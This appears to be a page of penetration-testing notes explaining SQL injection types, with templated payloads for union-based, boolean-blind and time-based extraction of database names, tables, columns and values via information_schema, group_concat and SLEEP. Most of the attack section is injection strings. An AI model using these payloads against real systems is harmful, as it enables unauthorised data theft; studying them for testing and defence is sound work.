SQL Injection

SQL Injection (SQLi) is a common and dangerous web security vulnerability that allows attackers to interfere with the queries an application makes to its database.

It occurs when untrusted input is inserted directly into an SQL query without proper validation or sanitization, enabling the attacker to execute malicious SQL commands.

There are various forms of SQL injection attacks, each targeting different aspects of how SQL queries interact with the database.

In-Band

Refers to the same method of communication being used to exploit the vulnerability and also receive the results.

Union-Based

Use the SQL UNION operator to return additional results to the page, letting the extraction of large amounts of data.

Case 1

  • Determining the number of columns

$url/query?$column=$value UNION SELECT 1
$url/query?$column=$value UNION SELECT 1,2   #Try with a extra value
$url/query?$column=$value UNION SELECT 1,2,3 #Try Until there's no message error
#This won't show a message error when the number of columns coincides

  • Change query value

$url/query?$column=$changedvalue UNION SELECT $found
#Change until no results are shown to determine the value

$found is the union value that has been caught in the previous step

  • Check database name

$url/query?$column=$changedvalue UNION $found,database() #Try to get database
#This will return the name of the DB we are searching

  • Check information schema for DB and tables information

$url/query?$column=$changedvalue UNION $found,group_concat(table_name) FROM information_schema.tables WHERE table_schema = '$dbfound'
#This will return a string with all tables of the database

the $dbfound value is the result of the previous query

  • Check information schema for DB and tables information

$url/query?$column=$changedvalue UNION $found,group_concat(colum_name) FROM information_schema.columns WHERE table_name = '$tablefound'
#This will return a string with all columns of the table

  • Obtain the values that we were looking for

0 UNION SELECT 1,2,group_concat($value1,$value2) FROM $tablefound
#Obtain values from the table we needed

Case 2

  • Check if vulnerable by sending a malformed petition with '

"GET /about/2' HTTP/1.1"
#We obtain a 500 error and this code
<code>SELECT firstName, lastName, pfpLink, role, bio FROM $tablename WHERE id = 2'</code>

  • As we know the number of columns, we make a union to select the column_name parameter and leave the other columns as null to avoid error. Then we obtain info from the default DB information_schema and select the column parameter specifying the name of the table we need

#Make the petition to an invalid value (-1) to avoid displaying an entry of the database instead of the column name
/about/-1 UNION ALL SELECT column_name,null,null,null,null FROM information_schema.columns WHERE table_name='$tablename'

 About | id None #The result obtained in the response

  • Use group_concat() to get all columns

/about/-1 UNION ALL SELECT group_concat(column_name),null,null,null,null FROM information_schema.columns WHERE table_name='$tablename'

About | id,firstName,lastName,pfpLink,role,shortRole,bio,$columname None #The result obtained in the response

  • Obtain the required information from the table

/about/-1 UNION ALL SELECT $columname,null,null,null,null FROM $tablename WHERE id = 1
#The response is the information that we were looking for

Error-Based

Obtaining information about the database structure as error messages from the database are printed directly to the browser screen.

Blind (Inferential)

Results of the attack can't directly be seen on the screen, we get little to no feedback to confirm whether our injected queries were.

Boolean Based

Use the response we receive back from our injection if this only has two outcomes

  • Check if the page has verification queries

$url/$query?$column=$value

  • Use union injection until the state changes

$url/query?$column=$changedvalue' UNION SELECT 1;
$url/query?$column=$changedvalue' UNION SELECT 1,2;   #Try with a extra value
$url/query?$column=$changedvalue' UNION SELECT 1,2,3; #Try Until the result change
#This will determine the number of columns

  • Find database name by iteration

$url/query?$column=$changedvalue' UNION SELECT $found where database() like '%';
#The value % will match anything true
$url/query?$column=$changedvalue' UNION SELECT $found where database() like 'a%'; #Try a
$url/query?$column=$changedvalue' UNION SELECT $found where database() like 'b%'; #Try b
#Repeat with every letter until found a value that gets true
$url/query?$column=$changedvalue' UNION SELECT $found where database() like '$lettera%';
#Make the same process for the next value
$url/query?$column=$changedvalue' UNION SELECT $found where database() LIKE '$letter$letter2a$%';
#Repeat until all DB names have been found

$found is the union value that has been caught in the previous step

$letter is the value that returns true in each iteration

  • Find Table name by iteration

$url/query?$column=$changedvalue' UNION $found FROM information_schema.tables WHERE table_schema = '$dbfound' and table_name LIKE 'a%';
#Repeat until found all table names

  • Find column by iteration

$url/query?$column=$changedvalue' UNION $found FROM information_schema.tables WHERE table_schema = '$dbfound' and table_name = 'table' and column_name LIKE 'a%';
#Make an iterative process to find the column name

  • Find objective value

$url/query?$column=$changedvalue' FROM $table_found WHERE %column_found LIKE 'a%';
#Make an iterative process to find the value needed

  • Handle of value exceptions

If at any point of iteration, you found a value that you don't need to get you must exclude it to restringe your injection

$url/query?$column=$changedvalue' UNION $found FROM information_schema.tables WHERE table_schema = '$dbfound' and and tablename != $notobjective and $table_name LIKE 'a%';

$notobjectiverefers to the value that we found but we don't need

Time-Based

Make use of the time a response is generated to the request to determine if the query value was found or not. It is used when we don't get a visual return to the injection.

  • Determining the number of columns

$url/query?$column=$changedvalue' UNION SELECT SLEEP($time);
$url/query?$column=$changedvalue' UNION SELECT SLEEP($time),2;
#Try until the petition time is different

The time of an error request is always less than a correct query

  • Make a Boolean-based iterative process to map DB, tables, and columns you need

#Find DB name, table, and column by an iterative process using sleep
$url/query?$column=$changedvalue' UNION SELECT SLEEP($time),$found FROM information_schema.tables WHERE table_schema = '$dbfound' and table_name = 'table' and column_name LIKE '%';
#The values of each step are dictated by the time the response is sent

  • Make Boolean based iterative process to find the value you need

#Find DB name, table, and column by an iterative process using sleep
$url/query?$column=$changedvalue' UNION SELECT SLEEP($time),$found FROM $table_found WHERE $column_found

Out Of Band

Depends on the DB feature of making some kind of external network call based on the results from an SQL query. Is classified by having two different communication channels:

  • One to launch the attack where the SQLi can be done to send a query

  • The other is to gather the results by intercepting responses from a database or another external service

Second-Order (Stored)

In this scenario, the attacker injects malicious data into the system that is not immediately executed but is stored and later used by the application. The SQL injection occurs at a later time when the data is used in another query.

PreviousAttack TechniquesNextAuthentication Bypass

Last updated